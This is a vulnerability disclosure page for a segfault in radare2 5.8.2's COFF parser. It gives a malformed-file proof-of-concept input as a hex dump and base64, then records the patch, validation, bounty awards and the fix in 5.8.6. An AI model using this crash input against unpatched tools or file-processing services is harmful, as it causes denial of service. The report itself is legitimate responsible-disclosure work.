SIGSEGV at libr/bin/p/bin_coff.c:509 in patch_relocs() in radareorg/radare2

Valid

Reported on

Mar 21st 2023

Description

radare2 5.8.2 misparses symbol information in COFF files, causing a segmentation fault in patch_relocs at libr/bin/p/bin_coff.c:509

Proof of Concept

input.bin

00000000: 6603 e846 4058 6458 4036 5858 5858 5868  f..F@XdX@6XXXXXh
00000010: 5858 7063 5858 5840 0038 00de 57ff ffff  XXpcXXX@.8..W...
00000020: 7f58 5858 0600 0000 0000 0010 0038 00de  .XXX.........8..
00000030: 57ff ffff 7f58 5858 0600 0000 0000 0010  W....XXX........
00000040: 0000 00ff 7fce 0000 4000 b03c 0000 ff7f  ........@..<....
00000050: ce00 0040 00b0 3c31 4058 d5d5 d5d5 5800  ...@..<1@X....X.
00000060: 00ff 4f0f 05                             ..O..

ZgPoRkBYZFhANlhYWFhYaFhYcGNYWFhAADgA3lf///9/WFhYBgAAAAAAABAAOADeV////39YWFgGAAAAAAAAEAAAAP9/zgAAQACwPAAA/3/OAABAALA8MUBY1dXV1VgAAP9PDwU=

run with r2 ./provided.bin

Impact

This vulnerability could lead to DoS

We are processing your report and will contact the radareorg/radare2 team within 24 hours. 2 months ago
echel0n submitted a
patch
2 months ago
echel0n
2 months ago

Researcher

the suggested patch is already merged

echel0n
2 months ago

Researcher

Be advised, do not submit CVE request for it. I already requested from MITRE directly.

pancake validated this vulnerability 2 months ago

Thanks for reporting and providing a reproducer!

echel0n has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
pancake marked this as fixed in 5.8.6 with commit 508a63 2 months ago
echel0n has been awarded the fix bounty
This vulnerability has been assigned a CVE
pancake published this vulnerability 2 months ago
to join this conversation